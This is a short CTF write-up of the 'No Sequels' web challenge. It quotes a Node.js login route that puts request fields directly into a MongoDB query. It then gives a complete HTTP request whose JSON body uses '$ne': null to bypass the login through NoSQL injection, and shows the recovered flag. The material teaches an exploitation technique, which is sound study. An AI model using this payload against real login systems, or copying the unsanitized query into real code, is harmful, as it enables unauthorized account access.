# ▼▼▼No Sequels(Web:50pts、solved:312/1374=22.7%)▼▼▼

This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)

```
The prequels sucked, and the sequels aren't much better, but at least we always have the original trilogy.

Author: SirIan

Hint: MongoDB is a safer alternative to SQL, right?
```

---

## 【source code】

```
app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: false }));

...

router.post('/login', verifyJwt, function (req, res) {
// monk instance
var db = req.db;

var user = req.body.username;
var pass = req.body.password;

if (!user || !pass){
res.send("One or more fields were not provided.");
}
var query = {
username: user,
password: pass
}

db.collection('users').findOne(query, function (err, user) {
if (!user){
res.send("Wrong username or password");
return
}

res.cookie('token', jwt.sign({name: user.username, authenticated: true}, secret));
res.redirect("/site");
});
});
```

---

## 【understanding functions】

・Login function exists

---

## 【exploit】

From the title, I think NoSQL injection

**Node.js** can also receive parameters in JSON format, so send the following **request converted to JSON format**

```
POST /login HTTP/1.1
Host: nosequels.2019.chall.actf.co
Content-Length: 67
Content-Type: application/json
Cookie: token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhdXRoZW50aWNhdGVkIjpmYWxzZSwiaWF0IjoxNTU1ODA0Nzc5fQ.N1GQCY5ZtBNZD-O9CK7nImn_jQjCqGdbE-46U4nDLQE

{
"username": {"$ne": null},
"password": {"$ne": null}
}
```

↓

`actf{no_sql_doesn't_mean_no_vuln}`